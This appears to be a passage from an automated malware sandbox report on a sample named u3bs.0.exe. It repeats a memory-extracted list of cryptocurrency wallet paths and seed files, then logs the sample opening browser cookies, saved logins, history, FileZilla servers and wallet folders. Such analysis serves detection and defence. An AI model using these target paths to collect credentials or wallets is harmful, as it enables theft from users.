                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
